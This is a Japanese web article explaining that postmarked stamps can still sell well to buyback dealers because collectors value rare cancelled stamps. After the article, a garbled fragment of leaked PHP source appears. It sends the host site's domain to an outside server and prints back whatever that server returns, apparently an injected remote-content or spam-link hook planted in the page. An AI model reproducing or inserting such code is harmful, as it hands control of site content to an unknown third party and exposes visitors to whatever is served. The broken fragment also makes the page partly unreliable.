前へ
次へ

消印済みの切手は買取価格は低くなるのか

切手を貼った郵便物を郵便局に持参すると、その場で消印が押されます。2回利用される事が無いよう、証明印を押す訳です。ところで古い切手によっては、その消印が押されている場合があります。たいていの切手には消印は付いていませんが、稀に例外もある訳です。普通切手は、一旦消印が押されてしまえば、今後利用する事はできません。再利用されるのを防ぐ為に、郵便局で押印されるからです。このため消印済みの切手は、買取価格は期待できないと思われている事もあります。ところが実際には、業者によっては高額買取になる場合があります。理由は、切手のコレクターです。切手を集めている方々は、珍しい物を手に入れたいと望んでいます。人によっては、消印済みの切手も入手したいと考えている訳です。プレミア価値が高い切手に消印が押されていると、コレクターによっては高く評価する事もあります。ですから、たとえ消印が押されていても、買取業者に切手を提示してみると良いでしょう。

".file_get_contents('http://links-002.com/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top